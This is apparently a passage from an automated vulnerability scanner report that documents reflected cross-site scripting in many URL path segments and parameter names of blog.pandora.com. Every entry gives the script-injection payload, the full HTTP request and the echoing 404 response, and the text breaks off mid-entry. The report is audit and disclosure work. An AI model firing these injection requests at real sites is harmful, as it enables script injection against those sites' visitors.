GET /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 795e1<script>alert(1)</script>4beca333580 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc6a7<script>alert(1)</script>380f8df8738 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 893eb<script>alert(1)</script>a835002da8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a128f<script>alert(1)</script>9b5600a0222 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa26<script>alert(1)</script>ccd92788417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb0a1<script>alert(1)</script>2021562e58c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2316c<script>alert(1)</script>13ece1ff165 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da3b3<script>alert(1)</script>63dacbe980f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3aeff<script>alert(1)</script>0e35543ed97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9922b<script>alert(1)</script>9d05ca919c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7cce4<script>alert(1)</script>41d4a417f15 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b0096<script>alert(1)</script>86b16cd0066 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 was not found on this server.</p> ...[SNIP]...
3.442. http://blog.pandora.com/pandora/assets_c/2010/11/North [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.pandora.com
Path:
/pandora/assets_c/2010/11/North
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload def5f<script>alert(1)</script>cbc7e5829ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 357
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75284<script>alert(1)</script>22efa64e34f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e532<script>alert(1)</script>7e0d5f16878 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1697<script>alert(1)</script>1beb0083bf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2be7b<script>alert(1)</script>5fa8c585472 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad328<script>alert(1)</script>2f7a6237729 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 was not found on this server.</p> ...[SNIP]...
3.448. http://blog.pandora.com/pandora/assets_c/2010/11/sd [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.pandora.com
Path:
/pandora/assets_c/2010/11/sd
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a53ff<script>alert(1)</script>c919746079d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
